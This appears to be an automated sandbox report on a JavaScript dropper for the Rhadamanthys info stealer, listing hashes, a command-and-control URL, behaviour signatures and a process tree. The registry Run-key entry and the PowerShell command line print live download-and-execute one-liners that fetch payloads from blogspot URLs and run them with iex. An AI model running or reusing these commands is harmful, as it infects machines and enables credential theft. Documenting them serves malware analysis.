Analysis
-
max time kernel
94s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 02:08
Static task
static1
Behavioral task
behavioral1
Sample
0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js
Resource
win10v2004-20241007-en
General
-
Target
0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js
-
Size
82KB
-
MD5
03844efc838d98e3a3aa6f935a2ff1db
-
SHA1
11c08db7fa610ff1a9e2bf7fb5e34015ceceec4f
-
SHA256
0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98
-
SHA512
a34ed6ea22b9f6c1ebbae01d15fec736612039b6ab2d45984ef65a5cf53046be44d5e97dbb160735634c2c18103f0751782db47e5f00ace65d73591d85128928
-
SSDEEP
768:7AK3GmGyO9RsGGx5osXrmsGaO95b9iyCfxAO111y21NHvlZupREEpRfr5onZWRUX:GZeGX2unjA06
Malware Config
Extracted
rhadamanthys
https://185.196.8.68:9367/ab43097ee4f6e091aed46f79/88pw46v5.ki88g
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 3664 created 2596 3664 RegSvcs.exe 44 PID 368 created 2596 368 RegSvcs.exe 44 -
Blocklisted process makes network request 2 IoCs
flow pid Process 8 4424 powershell.exe 12 4424 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation wscript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defenderlt-121 = "mshta \"javascript:xf=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot11nov.blogspot.com////loka.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(xf[2])[xf[0]](xf[1], 0, true);close();kq=new ActiveXObject('Scripting.FileSystemObject');kq.DeleteFile(WScript.ScriptFullName);\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defenderl-113 = "schtasks /run /tn Defenderl-113" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 11 bitbucket.org 12 bitbucket.org -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4424 set thread context of 3664 4424 powershell.exe 96 PID 4424 set thread context of 368 4424 powershell.exe 97 PID 4424 set thread context of 4600 4424 powershell.exe 98 PID 4424 set thread context of 2176 4424 powershell.exe 99 PID 4424 set thread context of 3196 4424 powershell.exe 100 PID 4424 set thread context of 1432 4424 powershell.exe 101 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 3664 RegSvcs.exe 3664 RegSvcs.exe 368 RegSvcs.exe 368 RegSvcs.exe 4540 openwith.exe 4540 openwith.exe 4540 openwith.exe 4540 openwith.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4424 powershell.exe Token: SeRestorePrivilege 412 dw20.exe Token: SeBackupPrivilege 412 dw20.exe Token: SeBackupPrivilege 412 dw20.exe Token: SeBackupPrivilege 2196 dw20.exe Token: SeBackupPrivilege 412 dw20.exe Token: SeBackupPrivilege 2196 dw20.exe Token: SeBackupPrivilege 412 dw20.exe Token: SeBackupPrivilege 4556 dw20.exe Token: SeBackupPrivilege 4556 dw20.exe Token: SeBackupPrivilege 1052 dw20.exe Token: SeBackupPrivilege 1052 dw20.exe Token: SeIncreaseQuotaPrivilege 4424 powershell.exe Token: SeSecurityPrivilege 4424 powershell.exe Token: SeTakeOwnershipPrivilege 4424 powershell.exe Token: SeLoadDriverPrivilege 4424 powershell.exe Token: SeSystemProfilePrivilege 4424 powershell.exe Token: SeSystemtimePrivilege 4424 powershell.exe Token: SeProfSingleProcessPrivilege 4424 powershell.exe Token: SeIncBasePriorityPrivilege 4424 powershell.exe Token: SeCreatePagefilePrivilege 4424 powershell.exe Token: SeBackupPrivilege 4424 powershell.exe Token: SeRestorePrivilege 4424 powershell.exe Token: SeShutdownPrivilege 4424 powershell.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeSystemEnvironmentPrivilege 4424 powershell.exe Token: SeRemoteShutdownPrivilege 4424 powershell.exe Token: SeUndockPrivilege 4424 powershell.exe Token: SeManageVolumePrivilege 4424 powershell.exe Token: 33 4424 powershell.exe Token: 34 4424 powershell.exe Token: 35 4424 powershell.exe Token: 36 4424 powershell.exe Token: SeIncreaseQuotaPrivilege 4424 powershell.exe Token: SeSecurityPrivilege 4424 powershell.exe Token: SeTakeOwnershipPrivilege 4424 powershell.exe Token: SeLoadDriverPrivilege 4424 powershell.exe Token: SeSystemProfilePrivilege 4424 powershell.exe Token: SeSystemtimePrivilege 4424 powershell.exe Token: SeProfSingleProcessPrivilege 4424 powershell.exe Token: SeIncBasePriorityPrivilege 4424 powershell.exe Token: SeCreatePagefilePrivilege 4424 powershell.exe Token: SeBackupPrivilege 4424 powershell.exe Token: SeRestorePrivilege 4424 powershell.exe Token: SeShutdownPrivilege 4424 powershell.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeSystemEnvironmentPrivilege 4424 powershell.exe Token: SeRemoteShutdownPrivilege 4424 powershell.exe Token: SeUndockPrivilege 4424 powershell.exe Token: SeManageVolumePrivilege 4424 powershell.exe Token: 33 4424 powershell.exe Token: 34 4424 powershell.exe Token: 35 4424 powershell.exe Token: 36 4424 powershell.exe Token: SeIncreaseQuotaPrivilege 4424 powershell.exe Token: SeSecurityPrivilege 4424 powershell.exe Token: SeTakeOwnershipPrivilege 4424 powershell.exe Token: SeLoadDriverPrivilege 4424 powershell.exe Token: SeSystemProfilePrivilege 4424 powershell.exe Token: SeSystemtimePrivilege 4424 powershell.exe Token: SeProfSingleProcessPrivilege 4424 powershell.exe Token: SeIncBasePriorityPrivilege 4424 powershell.exe Token: SeCreatePagefilePrivilege 4424 powershell.exe Token: SeBackupPrivilege 4424 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3712 wrote to memory of 4424 3712 wscript.exe 83 PID 3712 wrote to memory of 4424 3712 wscript.exe 83 PID 4424 wrote to memory of 3664 4424 powershell.exe 96 PID 4424 wrote to memory of 3664 4424 powershell.exe 96 PID 4424 wrote to memory of 3664 4424 powershell.exe 96 PID 4424 wrote to memory of 3664 4424 powershell.exe 96 PID 4424 wrote to memory of 3664 4424 powershell.exe 96 PID 4424 wrote to memory of 3664 4424 powershell.exe 96 PID 4424 wrote to memory of 3664 4424 powershell.exe 96 PID 4424 wrote to memory of 3664 4424 powershell.exe 96 PID 4424 wrote to memory of 368 4424 powershell.exe 97 PID 4424 wrote to memory of 368 4424 powershell.exe 97 PID 4424 wrote to memory of 368 4424 powershell.exe 97 PID 4424 wrote to memory of 368 4424 powershell.exe 97 PID 4424 wrote to memory of 368 4424 powershell.exe 97 PID 4424 wrote to memory of 368 4424 powershell.exe 97 PID 4424 wrote to memory of 368 4424 powershell.exe 97 PID 4424 wrote to memory of 368 4424 powershell.exe 97 PID 4424 wrote to memory of 4600 4424 powershell.exe 98 PID 4424 wrote to memory of 4600 4424 powershell.exe 98 PID 4424 wrote to memory of 4600 4424 powershell.exe 98 PID 4424 wrote to memory of 4600 4424 powershell.exe 98 PID 4424 wrote to memory of 4600 4424 powershell.exe 98 PID 4424 wrote to memory of 4600 4424 powershell.exe 98 PID 4424 wrote to memory of 4600 4424 powershell.exe 98 PID 4424 wrote to memory of 4600 4424 powershell.exe 98 PID 4424 wrote to memory of 2176 4424 powershell.exe 99 PID 4424 wrote to memory of 2176 4424 powershell.exe 99 PID 4424 wrote to memory of 2176 4424 powershell.exe 99 PID 4424 wrote to memory of 2176 4424 powershell.exe 99 PID 4424 wrote to memory of 2176 4424 powershell.exe 99 PID 4424 wrote to memory of 2176 4424 powershell.exe 99 PID 4424 wrote to memory of 2176 4424 powershell.exe 99 PID 4424 wrote to memory of 2176 4424 powershell.exe 99 PID 4424 wrote to memory of 3196 4424 powershell.exe 100 PID 4424 wrote to memory of 3196 4424 powershell.exe 100 PID 4424 wrote to memory of 3196 4424 powershell.exe 100 PID 4424 wrote to memory of 3196 4424 powershell.exe 100 PID 4424 wrote to memory of 3196 4424 powershell.exe 100 PID 4424 wrote to memory of 3196 4424 powershell.exe 100 PID 4424 wrote to memory of 3196 4424 powershell.exe 100 PID 4424 wrote to memory of 3196 4424 powershell.exe 100 PID 4424 wrote to memory of 1432 4424 powershell.exe 101 PID 4424 wrote to memory of 1432 4424 powershell.exe 101 PID 4424 wrote to memory of 1432 4424 powershell.exe 101 PID 4424 wrote to memory of 1432 4424 powershell.exe 101 PID 4424 wrote to memory of 1432 4424 powershell.exe 101 PID 4424 wrote to memory of 1432 4424 powershell.exe 101 PID 4424 wrote to memory of 1432 4424 powershell.exe 101 PID 4424 wrote to memory of 1432 4424 powershell.exe 101 PID 3196 wrote to memory of 412 3196 Msbuild.exe 102 PID 3196 wrote to memory of 412 3196 Msbuild.exe 102 PID 3196 wrote to memory of 412 3196 Msbuild.exe 102 PID 1432 wrote to memory of 2196 1432 Msbuild.exe 103 PID 1432 wrote to memory of 2196 1432 Msbuild.exe 103 PID 1432 wrote to memory of 2196 1432 Msbuild.exe 103 PID 2176 wrote to memory of 4556 2176 RegSvcs.exe 104 PID 2176 wrote to memory of 4556 2176 RegSvcs.exe 104 PID 2176 wrote to memory of 4556 2176 RegSvcs.exe 104 PID 4600 wrote to memory of 1052 4600 RegSvcs.exe 105 PID 4600 wrote to memory of 1052 4600 RegSvcs.exe 105 PID 4600 wrote to memory of 1052 4600 RegSvcs.exe 105 PID 3664 wrote to memory of 4540 3664 RegSvcs.exe 108 PID 3664 wrote to memory of 4540 3664 RegSvcs.exe 108
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2596
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4540
-
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4040
-
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://11-14hotelmain.blogspot.com///////chutmarao.pdf);Start-Sleep -Seconds 3;2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3664
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:368
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 9204⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 8964⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:412
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7964⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD586f393ccb22bd7546cef74c01c0f2ba4
SHA1c1824809545054b6e22695a093b0aea7f4759ad7
SHA25698d4a9c5abbdcd32034e618707da9aef683967b220edd61ea4f13f5e415b364d
SHA5122627780327b15aaf5b729cb032eaedfa20f2fbccd2003772fdc2ce579b7a037f7d2411c867a0d17a6ffec8abd28916a9bcae6893019ceb1eb1ba113144a4180a
-
Filesize
4KB
MD51ece772c238fcfee767b27e94971d42f
SHA186f186cff38657b11184cdd2817b94417907103c
SHA25688daf19b72fad39156ac273ae2dc97a1a72560beffc0658d494022f7f9b4da43
SHA5128a5f56bf50df6023381416a8ff4b55e54a7b655347ed0f6fe9ca86d5c1d3a35ed8b9bfb2bb1e260e796a6a409c1c078cbd7ec0abfa3d154f85943364643cfa50
-
Filesize
315B
MD569acc92e6df5c35cf75eded8f61ddeaa
SHA1b405090a2f92f85490705dcf77a6461ad85e7e20
SHA256da3437f337aca0e1f8d7b187abcd9112d88beddde8ab8ae5aa8a8ab91b6e9698
SHA5129b83a6ef14372d9e229beb69c1b1ede6f348fb51925205f99f705808db6331c5aab32bd57fc786c61647cbb94f7e4bd236dc9f4fc26be4c1ffc7a35e7619a508
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82